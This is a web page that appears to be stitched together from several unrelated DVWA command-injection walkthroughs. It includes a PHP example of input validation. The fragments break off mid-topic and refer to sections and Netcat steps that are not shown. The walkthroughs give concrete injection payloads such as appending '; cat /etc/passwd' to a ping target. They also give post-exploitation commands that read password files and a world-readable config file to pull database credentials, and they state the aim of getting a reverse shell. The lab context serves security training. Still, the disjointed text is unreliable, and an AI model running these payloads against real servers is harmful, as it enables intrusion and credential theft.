sherrievaubel3724r

DVWA : Command Execution Vulnerability - A Critical Web Application Security Flaw



In preparation for a new web security training course (German, coming soon), I had another look at the current version of the Damn Vulnerable Web App (DVWA). While documenting the solution for the command injection vulnerability on high, I found something that sparked a small idea of how this part might be exploited in a totally different way. Obviously I had to investigate further, and since I didn't see this solution out there already, I documented it here for anyone who's interested.




DVWA : Command Execution Vulnerability



Now on the medium security level, DVWA starts limiting the options by filtering out certain characters, i.e. && and ;. It's still easy enough to exploit, for example by using only one & or one of the numerous other characters that let us chain commands. I wanted to see whether the $ character could be used for mischief on its own, without using parentheses ($(command)), and came up with the following idea for medium.


Now that is the intended way to exploit DVWA on high. I was curious, however, whether this vulnerability can be exploited to execute system commands by using some of the remaining characters that haven't been filtered out, especially ', ", > and ?.


Not much to say here; it was fun tinkering with a vulnerability that I thought I already knew and finding a new way to exploit it. As I said, the include construct requires allow_url_include to be set in order to include remote sources, so this is not a sure-fire way of exploiting a faulty command execution feature. Nevertheless, I learned a new approach to this type of vulnerability and I hope others have too by reading this. If you have questions or additional ideas, I'm all ears. Best tweet me @hashtagsecurity or us @LastBreach.


Command injection is the most dangerous web application vulnerability (rated mostly 9-10.0/10.0 in CVSS score): it allows an attacker to run arbitrary OS commands on the host operating system through the vulnerable web application. This vulnerability is also referred to by various other names, such as OS injection, OS command injection, shell injection, shell command injection, etc.


As we know, the main cause of command injection vulnerabilities is improper input validation, so the primary way to protect against them is proper validation of user-supplied input, on the server side as well as the client side. Some of the other techniques are:


We get the same page as in the low level challenge. Again, we follow the same general steps for finding a command injection vulnerability: enter the loopback IP address and click the Submit button to check the functionality of the application.


Again, we get the same page as in the low and medium levels, and again we follow the same general steps for finding a command injection vulnerability. So, enter the loopback address and click the Submit button to check the functionality of the application.


  • Execute Ping

  • Notes: Below we are going to do a simple ping test using the web interface.

  • As an example, ping something on your network.

  • Use the IP address obtained in Section 3, Step 3 if you have nothing else to ping.

  • Instructions: 192.168.1.106

  • Click Submit


  • cat /etc/passwd (Attempt 1)

  • Instructions: cat /etc/passwd

  • Click Submit

  • Notes: Notice that either a message saying "illegal IP address" was displayed or nothing was returned.


  • cat /etc/passwd (Attempt 2)

  • Instructions: 192.168.1.106; cat /etc/passwd

  • Click Submit

  • Notes: Notice that we are now able to see the contents of the /etc/passwd file.


  • Looking at the weakness

  • Instructions: Bring up a terminal window (see Section 3, Step 1, if you don't know how)

  • cat /var/www/html/dvwa/vulnerabilities/exec/source/low.php

  • Notes: Notice the two shell_exec lines.

  • These are the lines that execute ping, depending on which operating system is being used.

  • On Unix/Linux, you can run multiple commands separated by a ";".

  • Notice the code does not check whether $target matches an IP address, \d+.\d+.\d+.\d+, where "\d+" represents a number of one or more digits, like 192.168.1.106.

  • The code therefore allows an attacker to append commands after the IP address: 192.168.1.106; cat /etc/passwd


  • Copy the /etc/passwd file to /tmp

  • Instructions: 192.168.1.106; cat /etc/passwd | tee /tmp/passwd

  • Note: Here we are not only displaying the contents of /etc/passwd on the web page, but also copying the /etc/passwd file to the /tmp directory.
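As an added example (not DVWA's own source, and not code from any of the write-ups collected on this page), the block below puts the unvalidated shell_exec pattern the low.php step describes next to a validated version, and also tests the \d+.\d+.\d+.\d+ regex quoted above against an injected value. The function names are hypothetical and the sample inputs are constructed; only the checks run, nothing is executed.

```php
<?php
// Added example, not DVWA's own source code. It contrasts the unvalidated
// shell_exec pattern the walkthrough above points out in low.php with a
// validated version. Function names are hypothetical and the sample inputs
// are constructed.

// The pattern under discussion: $target goes straight into the command
// string, so shell metacharacters in it (";", "&", "|", ...) turn one ping
// into one ping plus whatever follows.
function ping_unsafe(string $target): string
{
    $cmd = 'ping -c 4 ' . $target;            // no check on $target at all
    return (string) shell_exec($cmd);
}

// The regex quoted above, \d+.\d+.\d+.\d+, is not enough on its own:
// unanchored, it matches anywhere in the string, so "192.168.1.106; cat
// /etc/passwd" still passes. Anchoring it and escaping the dots closes that.
function matches_ip_regex_unanchored(string $target): bool
{
    return preg_match('/\d+.\d+.\d+.\d+/', $target) === 1;
}

function matches_ip_regex_anchored(string $target): bool
{
    return preg_match('/^\d{1,3}(\.\d{1,3}){3}\z/', $target) === 1;
}

// Preferred allow-list check: a syntactically valid IPv4 or IPv6 address
// and nothing else. FILTER_VALIDATE_IP returns false for any other input.
function is_valid_ip_target(string $target): bool
{
    return filter_var($target, FILTER_VALIDATE_IP) !== false;
}

// Hardened version: reject anything that is not an IP address, and quote
// the argument anyway so the value reaches ping as exactly one argv entry.
function ping_safe(string $target): string
{
    if (!is_valid_ip_target($target)) {
        return 'Error: not a valid IP address';
    }
    $cmd = 'ping -c 4 ' . escapeshellarg($target);
    return (string) shell_exec($cmd);
}

// Constructed inputs: the first two have the shape of the payloads
// submitted in the walkthrough, the third is a legitimate target.
// Only the checks run here; no ping is executed.
$samples = [
    '192.168.1.106; cat /etc/passwd',
    '192.168.1.106 & whoami',
    '127.0.0.1',
];
foreach ($samples as $s) {
    printf(
        "%-34s unanchored regex: %-8s anchored regex: %-8s filter_var: %s\n",
        $s,
        matches_ip_regex_unanchored($s) ? 'accepts' : 'rejects',
        matches_ip_regex_anchored($s) ? 'accepts' : 'rejects',
        is_valid_ip_target($s) ? 'accepts' : 'rejects'
    );
}
```

Running it shows the unanchored regex accepting both injected inputs while the anchored regex and filter_var reject them and accept only 127.0.0.1. Validation is the primary control; escapeshellarg is kept as a second layer so that even a future change to the allow-list cannot reintroduce command chaining.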




Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user-supplied data (forms, cookies, HTTP headers, etc.) to a system shell. In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Command injection attacks are possible largely due to insufficient input validation.


The environment plays a powerful role in the execution of system commands within programs. Functions like system() and exec() use the environment of the program that calls them, and therefore attackers have a potential opportunity to influence the behavior of these calls.


  • User Credentials Exploration

  • Notes (FYI): You will not see an actual command prompt, but you do have shell access.

  • Instructions: whoami

  • This command prints the username for the effective user ID.

  • If the username were root, we would be in full control; however, the username is apache.

  • grep apache /etc/passwd

  • Here I am checking whether the username is allowed to log in remotely.

  • When a shell is set to /sbin/nologin, that user cannot log in remotely.

  • grep apache /etc/group

  • It is important to discover any additional groups that apache might belong to.

  • In this case, apache is pretty well protected.


  • Explore Process and Directory Credentials

  • Instructions: ps -eaf | grep http

  • Typically, the Apache web server processes run as a daemon called httpd.

  • pwd

  • Print the current working directory.

  • This actually tells us a lot. It tells us the exact path from which the Netcat command was executed in Section 6, Step 2.

  • ls -ld /var/www/html

  • In Fedora, the "DocumentRoot" path is typically /var/www/html.

  • If this directory were owned by apache instead of root, we could do some web graffiti and many other things.

  • ls -ld /var/www/html/dvwa

  • The parent directory for DVWA is /var/www/html/dvwa.

  • Unfortunately, the apache username only has world read and execute permissions.

  • ls -l /var/www/html/dvwa

  • Now we are going to explore the contents of the DVWA directory.

  • Notice there is a config directory.

  • Config directories are important because they contain database credential information.


  • Database Credential Exploration

  • Instructions: ls -l /var/www/html/dvwa/config

  • We are shown there is a configuration file with a permission problem.

  • The config.inc.php problem is that its permissions are set to 644, meaning that anyone can read this file.

  • cat /var/www/html/dvwa/config/config.inc.php

  • Bingo!!!

  • For the database name dvwa, the user is root and the password is dvwaPASSWORD.




In this post, we are going to use a command injection vulnerability to gain access to the target web server through a reverse shell, and we will also cover how to secure your web server against this type of attack.


Step 1. In order to confirm that the application is vulnerable to command execution, we can try a simple command. Command injection is a technique used via a web interface to execute OS commands on a web server. Using the Damn Vulnerable Web Application (DVWA), it is very easy to find and exploit a command injection vulnerability in a certain vulnerable parameter or string.


Code execution vulnerabilities allow us to execute operating system commands on the web server. In this case, we will work with Linux commands, since the target server is Linux Metasploitable. There is a pinging tab in the menu. As can be seen, this section of the website is supposed to ping hosts, just as they would be pinged from a command prompt.


I was still able to leverage the command injection to compromise not just the server, but the entire infrastructure it was running on. After the dust settled, the critical report was made, and the vulnerability was closed, I thought the entire attack path was kind of fun, and decided to share how I went about it.

